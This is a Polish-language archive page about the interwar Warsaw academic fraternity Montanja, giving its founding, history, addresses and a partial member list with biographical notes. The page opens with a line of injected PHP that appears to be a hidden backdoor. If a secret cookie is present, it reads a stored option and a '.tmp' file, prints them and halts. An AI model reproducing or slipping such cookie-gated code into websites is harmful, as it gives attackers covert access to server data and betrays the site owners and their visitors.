if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Montanja

Dekiel Montanji - vide Poszukiwania. Nazwa:
Akademicka Korporacja Montanja
Siedziba:
Warszawa
Data powstania:
25 X 1925 r.
Barwy:
szara – srebrna – granatowa
Dewiza:
„Jeden za wszystkich, wszyscy za jednego”

Rys historyczny

Montańczycy z Kołem Pań, Warszawa druga poł. lat 30-tych.

Montanja powstała dnia 25 X 1925 r. Została założona przez grono studentów - wychowanków Gimnazjum Wojciecha Górskiego w Warszawie.

Początkowo w latach 1926-1928 należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. Po wystąpieniu ze Zjednoczenia dnia 1 VI 1928 r. została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 1 VI 1928 r.). Kandydowała pod opieką K! Jagiellonia. Dnia 6 VII 1930 r. uzyskała prawa członka rzeczywistego Związku.

Grupa Montańczyków - elewów szkół podchorążych, Warszawa ok. 1936/37 r.

W latach 30-tych przy korporacji działało Koło Pań.

Siedziby korporacji mieściły się: w roku akademickim 1928/29 przy ul. Wilanowskiej 8, w latach 1929-32 przy ul. Hortensji 2, w roku akademickim 1932/33 przy ul. Śniadeckich 10, a w latach 1936-37 przy ul. Czerwonego Krzyża.

Montańczycy, Warszawa lata 30-te.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 75 nazwisk, w tym jednego członka honorowego.

Brak wiadomości o powojennej działalności Montanji i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Montanja obejmuje 75 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Wojciech Górski, (23 kwietnia 1849 w Lakarcicach k. Grójca - 11 lutego 1935 w Warszawie) pedagog, w 1877 założył szkołę realną, którą w 1905 przekształcono w ośmioklasowe gimnazjum filologiczne, od 1883 do 1939 szkoła mieściła się w budynku przy u. Hortensji 2 (obecnie ul. W. Górskiego), Filister honorowy Montanji

Członkowie rzeczywiści

 1. Juljusz Asłanowicz, student UW, c. 1932/33, akt. 1932/33
 2. Roman Bandurski, student WSH, akt. 1928-29

  Józef Borowski, 1977 r.

 3. Józef Borowski, student PW, c. 1928/29, akt. 1928/29-33

  Karol Broszkiewicz, 1977 r.

 4. Karol Broszkiewicz, student UW, c. 1928/29, akt. 1928/29

 5. Bogumił Brudziński, student WSH, c. 1928/29, akt. 1928/29
 6. Jerzy Brzuszkiewicz, student UW, akt. 1928-31, prezes sem. let. 1928/29, I wiceprezes sem. zim. 1930/31, sekretarz sem. zim. 1931/32
 7. Jerzy Ciepichałł, ( - po 1945) student WSH, c. 1932/33, akt. 1932/33
 8. Janusz Dłutek, student UW, c. 1931/32, akt. 1931/32-33
 9. Władysław Doberski, (1913-1997) student UW, c. 1931/32, akt. 1931/32-33
 10. Jerzy Dobrzelewski, student PW, c. 1931/32, akt. 1931/32-33
 11. Kazimierz Dulski, student PW, c. 1928/29, akt. 1928/29-30
 12. Karol Duszyński, student PW, c. 1931/32, akt. 1931/32-33
 13. Jerzy Dziewurski, student PW, c. 1931/32, akt. 1931/32-33
 14. K. Dzwonkowski, (?)
 15. Mieczysław Fiszer, student USB 1928-31, od 1932 UW, akt. 1928-33, II wiceprezes sem. zim. 1930/31, prezes sem. zim. 1931/32
 16. Wacław Fugiński, student WSH, c. 1928/29, akt. 1928/29-33
 17. Stanisław Gaszyński, student WSH, akt. 1928-31
 18. Tadeusz Gout, ( - 1978) student UW, c. 1930/31, akt. 1930/31-32, wiceprezes zewn. sem. zim oraz sem. let. 1932/33
 19. Jerzy Górski, (?), s. Wojciecha, brat Władysława (obaj Montanja)
 20. Władysław Górski, (?), s. Wojciecha, brat Jerzego (obaj Montanja)
 21. Stanisław Hellmich, student UW, c. 1930/31, akt. 1930/31-33
 22. Artur Hettlinger, student UW, akt. 1928-29
 23. Władysław Hodman (?),
 24. Władysław Hofman, student PW, akt. 1928-32, olderman sem. let. 1929/30 i sem. zim. 1930/31, olderman sem. zim. 1931/32
 25. Juljan Izdebski, student PW, c. 1928/29, akt. 1928/29-33
 26. Zygmunt Jabłkowski, student WSH, od 1931 UW, c. 1930/31, akt. 1930/31-33, wiceprezes wewn. 1932/33
 27. Tadeusz Jaśkowski, ( - 1931/32) student WSH, c. 1928/29, akt. 1928/29-31
 28. Wojciech Kačer, student PW, akt. 1928-33
 29. Stanisław Kamieniecki, student SGGW, student PW (1931), akt. 1930-33
 30. Władysław Kamieniecki, student UW, akt. 1928-29
 31. Józef Kobierzycki, student UW, c. 1928/29, akt. 1928/29-33
 32. Tadeusz Kostrzębski, student SGGW, c. 1928/29, akt. 1928/29-33, sekretarz sem. zim. 1930/31, olderman sem. zim. 1931/32
 33. Jan Korzeniowski, student UW, c. 1930/31, akt. 1930/31-33
 34. Władysław Krzychowiec, student UW, akt. 1928-33, olderman sem. let. 1928/29
 35. Henryk Kurman, student WSH, akt. 1928-33, wiceprezes zewn. sem. let. 1928/29, olderman 1932/33
 36. Jan Kurowski, student UW, c. 1931/32, akt. 1931/32-33
 37. Jerzy Leszczyński, student SGGW, akt. 1928-31
 38. Władysław Lewandowski, student UW, c. 1932/33, akt. 1932/33
 39. Jan Linowski, student SGGW, od 1931 Akademia Rolnicza Lwów, c. 1928/29, akt. 1928/29-32
 40. Kazimierz Łochocki, student WSH, akt. 1928-33, sekretarz sem. let. 1928/29, skarbnik sem. let. 1929/30, wiceprezes zewn. sem. zim. 1931/32, prezes sem. let. 1932/33
 41. Władysław Łochocki, student WSH, akt. 1928-33, prezes sem. let. 1929/30, wiceprezes wewn. sem. zim. 1931/32
 42. Jerzy Marszewski, student UW, c. 1931/32, akt. 1931/32-33
 43. Stanisław Marszewski, (1916-1998/9) student UW, c. 1936, student Santa Monica Collage w Kalifornii, inż. elektryk
 44. Czesław Michalak, student UW, c. 1931/32, akt. 1931/32-33, sekretarz sem. let. 1932/33
 45. Marjan Mieczyński, student UW, c. 1931/32, akt. 1931/32-33
 46. Stanisław Mieczyński, student PW, c. 1931/32, akt. 1931/32-33
 47. Wiesław Mokrzyszewski, student PW, akt. 1928-29
 48. Eugeniusz Myszkowski, student UW, akt. 1928-33
 49. Witold Myszkowski, student UW, c. 1928/29, akt. 1928/29-30
 50. Wiesław Niebieszczański, student i absolwent (inż.) PW, akt. 1928-33, wiceprezes sem. let. 1929/30, prezes sem. zim. 1930/31
 51. Henryk Olszewski, student UW, c. 1931/32, akt. 1931/32
 52. Aleksander Ostrouch, student UW, c. 1931/32, akt. 1931/32-33
 53. Stanisław Ostrouch, student PW, akt. 1928-33, sekretarz sem. let. 1929/30
 54. Zygmunt Protassewcz, (?)
 55. Eugeniusz Przytulski, student PW, akt. 1928-29
 56. Jerzy Rand, ( - po 1945)
 57. Andrzej Reinhardt (Reinchardt), student PW, c. 1931/32, akt. 1931/32-33
 58. Leszek Skonieczny, student PW, c. 1931/32, akt. 1931/32-33
 59. Stanisław Starzyński, student PW, c. 1931/32, akt. 1931/32
 60. Mieczysław Staszkiewicz, student UW, c. 1931/32, akt. 1931/32-33
 61. Bronisław (Syrokomla-)Stefanowski, student UW, c. 1928/29, akt. 1928/29-33

  Zygmunt Stefański, 1977 r.

 62. Zygmunt Stefański, student PW, od 1930 PL, akt. 1928-33, skarbnik sem. zim. 1928/29

 63. Jan Szaniawski, student UW, c. 1929/30, akt. 1929/30-33, sekretarz sem. zim. 1932/33
 64. Janusz Szlązkiewicz, (1912-1977 w Warszawie) student i absolwent prawa UW, c. 1931/32, akt. 1931/32-33, wiceprezes wewn. sem. let. 1932/33, w wojnie obronnej 1939 w III Pułku Szwoleżerów m.in. w Bitwie pod Kockiem, w niewoli niemieckiej w obozie II C Woldenberg 1939-45, po wojnie sędzia, orzekał w sprawach karnych
 65. Walenty Szypowski, student PW, c. 1930/31, akt. 1930/31-32

  Jędrzej Trojanowski, 1977 r.

 66. Jędrzej Trojanowski, student WSH, akt. 1928-30, wiceprezes wewn. sem. let. 1928/29

 67. Franciszek Wańkowicz, student UW, akt. 1928-31
 68. Jerzy Wasilewski, student UW, c. 1931/32, akt. 1931/32-33
 69. Zbigniew Weber, student UW, c. 1932/33, akt. 1932/33
 70. Tadeusz Zboiński, student PW, akt. 1929-33, wiceolderman sem. zim. 1928/29, prezes sem. zim. 1932/33
 71. Franciszek Zdanowicz-Krukowski, student PW, akt. 1928-33, sekretarz sem. let. 1930/31
 72. Władysław Zieliński-Zadziełło, student PW, c. 1928/29, akt. 1928/29-30
 73. Zdzisław Żebrowski, ( - 25 lutego 1929) student med. UW, założyciel Monanji, akt. 1925-29
 74. Stanisław Żymierski, student UW, c. 1928/29, akt. 1928/29-30

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1928-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Montanja.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 1 IX 2010 r.
Ostatnia zmiana: 25 XI 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Akademicka Korporacja Montanja (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 25 XI 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }